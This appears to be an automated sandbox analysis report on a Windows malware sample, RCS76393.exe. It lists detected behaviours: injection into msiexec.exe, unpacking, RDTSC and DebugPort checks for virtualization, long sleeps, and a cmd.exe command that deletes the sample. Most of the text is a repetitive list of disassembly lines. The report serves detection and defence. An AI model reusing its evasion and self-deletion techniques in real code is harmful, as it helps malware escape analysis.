          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RCS76393.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: Binary string: msiexec.pdb source: RCS76393.exe, 00000003.00000002.363009374.0000000000D80000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.348166321.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: msiexec.pdbGCTL source: RCS76393.exe, 00000003.00000002.363009374.0000000000D80000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: RCS76393.exe, 00000003.00000002.362641926.0000000000AEF000.00000040.00000001.sdmp, msiexec.exe, 00000007.00000002.588142042.0000000004560000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: RCS76393.exe, msiexec.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.348166321.000000000DC20000.00000002.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\RCS76393.exeUnpacked PE file: 3.2.RCS76393.exe.400000.0.unpack .text:ER;.data:W;.jidiy:W;.wahe:W;.new:R;.rsrc:R;.reloc:R; vs .text:ER;
          Source: RCS76393.exeStatic PE information: section name: .jidiy
          Source: RCS76393.exeStatic PE information: section name: .wahe
          Source: RCS76393.exeStatic PE information: section name: .new
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00416257 push ebx; retf
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_004072E3 push esp; retf
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_0041B3B5 push eax; ret
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_0041B46C push eax; ret
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_0041B402 push eax; ret
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_0041B40B push eax; ret
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00415FDB push es; iretd
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00415F86 push ds; retf
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A4D0D1 push ecx; ret
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_1_00416257 push ebx; retf
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_1_004072E3 push esp; retf
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045DD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030BB3B5 push eax; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030B6257 push ebx; retf
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030A72E3 push esp; retf
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030B5F86 push ds; retf
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030B5FDB push es; iretd
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030BB40B push eax; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030BB402 push eax; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030BB46C push eax; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.49545295007
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\RCS76393.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\RCS76393.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msiexec.exeRDTSC instruction interceptor: First address: 00000000030A85E4 second address: 00000000030A85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msiexec.exeRDTSC instruction interceptor: First address: 00000000030A897E second address: 00000000030A8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_004088B0 rdtsc
          Source: C:\Windows\explorer.exe TID: 6280Thread sleep time: -45000s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7148Thread sleep time: -52000s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
          Source: explorer.exe, 00000005.00000000.345500910.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.345328681.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000005.00000000.346305900.0000000008540000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.344732574.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.339421845.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000005.00000000.340676786.00000000063F6000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.345328681.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000005.00000000.340676786.00000000063F6000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.344732574.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000005.00000000.339421845.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000005.00000000.339421845.0000000005D50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000005.00000000.344732574.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000005.00000000.345500910.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000005.00000000.339421845.0000000005D50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: explorer.exe, 00000005.00000000.329599785.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: C:\Users\user\Desktop\RCS76393.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\RCS76393.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_004088B0 rdtsc
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00409B20 LdrLoadDll,
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A390AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A2F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A2F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A2F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009F9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A73884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A73884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009F58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A8B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A8B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A8B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A8B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A8B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A8B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A0B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A0B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A0B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A0B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A2002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A2002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A2002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A2002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A2002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A77016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A77016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A77016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AC4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AC4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AB2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AC1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A10050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A10050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A769A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A261A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A261A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A1C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A2A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A22990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A841E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009FB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009FB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009FB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A14120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A14120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A14120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A14120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A14120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A2513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A2513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009F9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009F9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009F9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A1B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A1B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009FB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009FB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009FC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A0AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A0AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A2FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A2D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A2D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A22AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A22ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009FAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009FAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A34A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A34A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009F5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009F5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009F5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009F5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A08A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A13A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AAB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AAB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AC8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A3927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009F9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009F9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009F9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009F9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00ABEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A84257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AC5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A24BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A24BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A24BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AB138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AAD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A01B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A01B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A2B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A22397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A1DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A753CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A753CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AB131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009FF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A23B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A23B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009FDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AC8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009FDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A0849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AB14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A76CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A76CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A76CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AC8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A2BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AC740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AC740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AC740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A76C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A76C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A76C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A76C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A1746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A2A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A8C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A8C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AC05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AC05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A235A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009F2D8A mov eax, dword ptr fs:[00000030h]
